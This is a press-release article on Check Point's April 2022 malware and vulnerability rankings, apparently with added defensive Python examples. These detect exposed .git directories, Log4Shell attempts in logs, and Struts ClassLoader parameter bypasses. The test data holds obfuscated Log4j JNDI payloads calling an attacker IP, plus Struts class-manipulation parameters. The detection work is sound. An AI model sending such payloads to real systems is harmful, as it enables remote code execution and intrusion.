PARIS: Check Point Research Top Malware Report, Major Rank Changes

In France, the most active malware families are Emotet, Formbook and AgentTesla.

Check Point Research (CPR), the Threat Intelligence division of Check Point® Software Technologies Ltd. (NASDAQ: CHKP), one of the world’s leading cybersecurity solution providers, has published its Global Threat Index for April 2022. Researchers report that Emotet, an advanced, self-propagating and modular Trojan, is still the most prevalent malware, affecting 6% of organizations worldwide. Elsewhere in the index there was movement: Tofsee and Nanocore dropped off the list and were replaced by Formbook and Lokibot, now the second and sixth most common malware respectively.

Emotet’s higher score in March (10%) was mainly due to specific Easter-themed scams, but this month’s drop may also be explained by Microsoft’s decision to disable certain macros in Office files, which affects how Emotet is typically delivered. Indeed, according to some reports, Emotet has a new delivery method: phishing emails containing a OneDrive URL. Emotet has many uses once it has bypassed a machine’s defences. Because of its sophisticated spreading and assimilation methods, Emotet is also used to deliver other malware offered to cybercriminals on dark web forums, including banking trojans, ransomware and botnets. As a result, once Emotet gains a foothold, the consequences vary depending on which malware is delivered after the initial compromise.

Elsewhere, the infostealer Lokibot re-entered the rankings at number six after a massive spam campaign that delivered the malware via .xlsx files resembling legitimate invoices. This, together with the rise of Formbook, pushed other malware down: the advanced remote access trojan (RAT) AgentTesla, for example, dropped from second to third place.

At the end of March, critical vulnerabilities were disclosed in the Spring Java framework, collectively known as Spring4Shell, and attackers have since exploited them to spread Mirai, the ninth most prevalent malware this month.

“The cyber threat landscape is constantly changing, and large companies such as Microsoft are influencing the parameters within which cybercriminals can operate. Attackers need to be more creative in their distribution of malware, as evidenced by the new delivery method used by Emotet,” said Maya Horowitz, Vice President of Research at Check Point. “In addition, the Spring4Shell vulnerability made headlines this month. Although it is not yet in the top ten vulnerabilities, it is worth noting that more than 35% of organizations worldwide have already been affected by this threat in the first month alone, and therefore we expect to see it climb the list in the coming months.”

CPR also reported this month that the education and research sector remains the most targeted by cybercriminals worldwide. “Web Server Exposed Git Repository Information Disclosure” is the most commonly exploited vulnerability, affecting 46% of organizations worldwide, followed by a small margin by “Apache Log4j Remote Code Execution”. “Apache Struts ParametersInterceptor ClassLoader Security Bypass” jumped up the index and is now in third place with a global impact of 45%.

Top Malware Families

* Arrows indicate the change in position from the previous month.

This month, Emotet remains the most prevalent malware, affecting 6% of organizations worldwide, followed by Formbook, which affects 3% of organizations, and AgentTesla, which affects 2%.

1. Emotet – Emotet is an advanced, self-propagating and modular Trojan. Once used as a banking Trojan, Emotet has recently been used as a distributor of other malware and malicious campaigns. It uses several techniques to maintain persistence and evasion techniques to avoid detection. It can be spread through phishing spam emails containing malicious attachments or links.

2. Formbook – Formbook is an infostealer targeting the Windows operating system, first seen in 2016. It is marketed as malware-as-a-service (MaaS) on underground hacking forums for its strong evasion techniques and relatively low price. Formbook harvests credentials from various web browsers, takes screenshots, monitors and logs keystrokes, and can download and execute files on command from its C&C server.

3. AgentTesla – AgentTesla is an advanced RAT functioning as a keylogger and information stealer, capable of monitoring and collecting the victim’s keyboard input and system clipboard, taking screenshots, and exfiltrating credentials from a variety of software installed on the victim’s machine (including Google Chrome, Mozilla Firefox and the Microsoft Outlook email client).

Top Attacked Industries Globally

This month, education/research was the most attacked industry globally, followed by government/military, and then Internet service providers and managed service providers (ISPs/MSPs).

1. Education/Research

2. Government/Military

3. Internet Service Providers/Managed Service Providers (ISPs/MSPs)

Top Exploited Vulnerabilities

This month, “Web Server Exposed Git Repository Information Disclosure” is the most commonly exploited vulnerability, affecting 46% of organizations worldwide, followed by “Apache Log4j Remote Code Execution”, which also affects 46% of organizations worldwide. “Apache Struts ParametersInterceptor ClassLoader Security Bypass” now ranks third in the list of most exploited vulnerabilities, with a global impact of 45%.

1. Web Server Exposed Git Repository Information Disclosure – An information disclosure vulnerability has been reported for Git repositories served from a web server: when the .git directory of a deployed site is reachable over HTTP, its contents (history, configuration, and any secrets committed or stored in them) can be read remotely. Successful exploitation could allow the unintentional disclosure of account information.
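A practitioner’s first question about this entry is how to tell a genuinely exposed repository from a server that answers 200 to everything, and what in the repository actually leaks account information. The following is an added example, not code from Check Point or from the report: it checks a site’s /.git/HEAD for real git content and reads remote URLs out of /.git/config, flagging embedded credentials. The site responses, hostnames and credentials are constructed for the example; a real probe would fetch the two paths over HTTP itself.

```python
"""Added example (not from the Check Point report): an offline check for an
exposed .git directory on a web server, and for the account information it can
leak. Hostnames, paths and credentials below are constructed for this example;
a real probe would fetch /.git/HEAD and /.git/config over HTTP itself.
"""
import re
from urllib.parse import urlsplit

# What a probe sees: path -> (HTTP status, response body). Constructed samples.
EXPOSED_SITE = {
    "/.git/HEAD": (200, "ref: refs/heads/main\n"),
    "/.git/config": (200,
        '[core]\n\trepositoryformatversion = 0\n'
        '[remote "origin"]\n'
        '\turl = https://deploy:s3cr3t-token@git.example.internal/shop/web.git\n'
        '\tfetch = +refs/heads/*:refs/remotes/origin/*\n'
        '[remote "mirror"]\n'
        '\turl = git@git.example.internal:shop/web.git\n'),
}
# A site that answers every path with 200 and an HTML page (a "soft 404").
SOFT_404_SITE = {
    "/.git/HEAD": (200, "<html><body>Page not found</body></html>"),
    "/.git/config": (200, "<html><body>Page not found</body></html>"),
}

# A real HEAD is either a symbolic ref or a bare 40-hex commit id.
HEAD_RE = re.compile(r"^(ref: refs/\S+|[0-9a-f]{40})\s*$")
URL_RE = re.compile(r"^\s*url\s*=\s*(\S+)", re.M)
USERINFO_RE = re.compile(r"//([^/@:]+):[^/@]*@")


def git_exposed(site):
    """True when /.git/HEAD is served with genuine git content, which is the
    signal scanners key on; a 200 with an HTML body does not count."""
    status, body = site.get("/.git/HEAD", (404, ""))
    return status == 200 and HEAD_RE.match(body) is not None


def leaked_remotes(site):
    """Parse remote URLs out of /.git/config and flag embedded credentials,
    the 'account information' an exposed repository most often gives away."""
    status, body = site.get("/.git/config", (404, ""))
    if status != 200:
        return []
    findings = []
    for url in URL_RE.findall(body):
        parts = urlsplit(url)  # scp-style git@host:path has no netloc, so no userinfo
        findings.append({
            "url": USERINFO_RE.sub(r"//\1:***@", url),  # redacted, safe for a report
            "user": parts.username,
            "has_secret": parts.password is not None,
        })
    return findings


if __name__ == "__main__":
    for name, site in (("exposed", EXPOSED_SITE), ("soft-404", SOFT_404_SITE)):
        print(name, "exposed:", git_exposed(site))
        for f in leaked_remotes(site):
            print("  remote", f["url"], "user:", f["user"], "secret:", f["has_secret"])
```

The HEAD check matters because many sites return a 200 status with a generic page for unknown paths; matching the body against git’s actual HEAD format avoids false positives. Credentials in remote URLs are only the most obvious leak: with the .git directory readable, the full object store and history can be reconstructed as well, so the fix is to deny access to the directory at the web server rather than to scrub one file.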

2. Apache Log4j Remote Code Execution (CVE-2021-44228) – A remote code execution vulnerability exists in Apache Log4j, triggered when a vulnerable version logs attacker-controlled text containing a JNDI lookup of the form ${jndi:ldap://host/path}. Successful exploitation could allow a remote attacker to execute arbitrary code on the affected system.
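As an added illustration (not Check Point’s detection logic) of what a practitioner would look for in access logs for this entry: the scanner below resolves the nested Log4j lookups that attackers use to hide the string ${jndi:, then reports the JNDI scheme. The log lines are constructed; the lookup semantics are a deliberately small approximation of Log4j 2.x (lower, upper and the ':-' default value), enough for detection rather than a reimplementation.

```python
"""Added example (not from the Check Point report): flag Log4Shell
(CVE-2021-44228) attempts in web server logs. A plain search for "${jndi:"
misses the nested-lookup obfuscation seen in the wild, so the scanner first
resolves the lookups Log4j would resolve. The log lines are constructed.
"""
import re
from urllib.parse import unquote

INNER = re.compile(r"\$\{([^${}]*)\}")                    # an innermost ${...}
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(\w+)\s*:", re.I)   # ${jndi:<scheme>:...


def _resolve(expr):
    """Approximate Log4j 2.x evaluation of one lookup used as padding:
    lower/upper transforms, and the ':-default' value when the lookup fails
    (e.g. ${::-j}, ${env:NOPE:-j}). Anything else becomes empty."""
    prefix, sep, rest = expr.partition(":")
    if not sep:
        return ""
    if prefix.lower() == "lower":
        return rest.lower()
    if prefix.lower() == "upper":
        return rest.upper()
    if ":-" in rest:
        return rest.split(":-", 1)[1]
    return ""


def normalize(text, max_rounds=64):
    """Collapse nested lookups from the inside out, leaving any ${jndi:...}
    in place so the detector can see it."""
    for _ in range(max_rounds):
        target = next((m for m in INNER.finditer(text)
                       if not m.group(1).lower().startswith("jndi:")), None)
        if target is None:
            break
        text = text[:target.start()] + _resolve(target.group(1)) + text[target.end():]
    return text


def jndi_scheme(line):
    """Return the JNDI scheme (ldap, rmi, dns, ...) if the line carries a
    lookup, else None. URL-decoded first, since payloads often ride in the path."""
    m = JNDI.search(normalize(unquote(line)))
    return m.group(1).lower() if m else None


def scan(lines):
    """(line index, scheme) for every line that carries a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines):
        scheme = jndi_scheme(line)
        if scheme:
            hits.append((i, scheme))
    return hits


# Constructed Apache-style access log lines: one benign, three attempts.
LOGS = [
    '10.0.0.5 - - [29/Apr/2022:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [29/Apr/2022:10:01:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.9:1389/a}"',
    '203.0.113.9 - - [29/Apr/2022:10:01:09 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${lower:j}${upper:n}${::-d}${env:NOPE:-i}:${lower:RMI}://203.0.113.9:1099/x}"',
    '203.0.113.9 - - [29/Apr/2022:10:01:11 +0000] "GET /?q=%24%7Bjndi%3Adns%3A%2F%2F203.0.113.9%2Fz%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for idx, scheme in scan(LOGS):
        print(f"line {idx}: jndi lookup via {scheme}")
```

Two caveats when running this over real logs: the line is URL-decoded once, so a double-encoded payload needs a second pass, and a hit only means an attempt was logged, not that the application was vulnerable; confirmation comes from the Log4j version in use and from outbound LDAP/RMI/DNS connections to the host named in the lookup.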

3. Apache Struts ParametersInterceptor ClassLoader Security Bypass (CVE-2014-0094, CVE-2014-0112, CVE-2014-0113, CVE-2014-0114) – A security bypass vulnerability exists in Apache Struts. It is caused by inadequate validation of the data processed by the ParametersInterceptor, which allows manipulation of the ClassLoader. A remote attacker could exploit this vulnerability by supplying a class parameter in the request.
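The reason four CVEs share one signature is that the first fix was a denylist on parameter names that was trivially bypassed. The following is an added example, not code from Check Point or from the Struts project: it replays the parameter-name exclusion against a constructed request. The two regexes are, as I recall them, the “class” entries of the default excludeParams in Struts 2.3.16.1 (the CVE-2014-0094 fix) and 2.3.16.2 (the fix for CVE-2014-0112/0113); verify them against the release you run.

```python
"""Added example (not from the Check Point report): the parameter-name
exclusion at the heart of the Struts ParametersInterceptor ClassLoader issue.
The two regexes are, as I recall them, the 'class' entries of the default
excludeParams in Struts 2.3.16.1 (CVE-2014-0094 fix) and 2.3.16.2
(CVE-2014-0112/0113 fix); check them against the release you run. The request
parameters are constructed samples.
"""
import re

# 2.3.16.1: only names beginning with the lowercase literal "class." are dropped.
EXCLUDE_2_3_16_1 = [r"^class\..*"]

# 2.3.16.2: a segment named class/Class, reached by dot or bracket access,
# anywhere in the expression.
EXCLUDE_2_3_16_2 = [r"""(.*\.|^|.*|\[('|"))(c|C)lass(\.|('|")]|\[).*"""]


def is_excluded(name, patterns):
    # Struts tests the whole parameter name (Matcher.matches), hence fullmatch.
    return any(re.fullmatch(p, name) for p in patterns)


def accepted_params(params, patterns):
    """The subset of request parameters the interceptor would hand to OGNL."""
    return {k: v for k, v in params.items() if not is_excluded(k, patterns)}


# Constructed request: one legitimate parameter and three OGNL expressions that
# all walk getClass().getClassLoader() (the public PoC reached Tomcat's
# dirContext.docBase through it).
REQUEST = {
    "user.name": "alice",
    "class.classLoader.resources.dirContext.docBase": "/tmp",
    "Class.classLoader.resources.dirContext.docBase": "/tmp",     # OGNL accepts the capital
    "class['classLoader'].resources.dirContext.docBase": "/tmp",  # bracket access
}

if __name__ == "__main__":
    print("2.3.16.1 lets through:", sorted(accepted_params(REQUEST, EXCLUDE_2_3_16_1)))
    print("2.3.16.2 lets through:", sorted(accepted_params(REQUEST, EXCLUDE_2_3_16_2)))
```

The lesson is the usual one about denylists: the first pattern checks case and one access syntax, so two spellings of the same property path walk straight past it. The broader pattern closes those two, and later Struts releases moved further toward an allowlist of acceptable parameter-name characters; the Check Point signature fires on the class parameter itself, whichever variant is used.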

Top Mobile Malware

This month, AlienBot is the most prevalent mobile malware, followed by FluBot and xHelper.

1. AlienBot – The AlienBot malware family is malware-as-a-service (MaaS) for Android devices that allows a remote attacker, as a first step, to inject malicious code into legitimate financial applications. The attacker gains access to the victims’ accounts and eventually takes full control of the device.

2. FluBot – FluBot is an Android botnet distributed via phishing SMS messages (smishing), most often impersonating logistics and parcel delivery brands. Once the user clicks the link in the message, they are redirected to download a fake application containing FluBot. Once installed, the malware has various capabilities for collecting credentials and supporting the smishing operation itself, including uploading the contact list and sending SMS messages to other phone numbers.

3. xHelper – A malicious application seen in the wild since March 2019, used to download other malicious applications and display advertisements. The application can hide itself from the user and reinstall itself if it is removed.

The Check Point Global Threat Impact Index and its ThreatCloud Map are based on Check Point’s ThreatCloud intelligence. ThreatCloud provides real-time threat intelligence derived from hundreds of millions of sensors worldwide, across networks, endpoints and mobile devices.


A full list of the top 10 malware families in April is available on the Check Point Blog.


Check Point Research

Check Point Research (CPR) provides cutting-edge cyber threat intelligence to Check Point Software customers and the wider information community. The research team collects and analyzes global cyber attack data stored in ThreatCloud to keep hackers at bay and ensure all Check Point products are updated with the latest security features. The research team is made up of over one hundred analysts and researchers who collaborate with other security providers, law enforcement, and several CERTs.

Check Point Software Technologies Ltd. is a leading provider of cybersecurity solutions for governments and businesses around the world. The Check Point Infinity portfolio protects businesses and public organizations from Gen 5 cyberattacks with unrivalled catch rates for malware, ransomware and other types of attacks. Infinity comprises three core pillars that provide complete security and fifth-generation threat prevention for enterprise environments: Check Point Harmony for remote users, Check Point CloudGuard for automatic cloud protection, and Check Point Quantum for protecting network perimeters and data centers, all controlled by the industry’s most comprehensive and intuitive unified security management. Check Point protects over 100,000 organizations of all sizes.
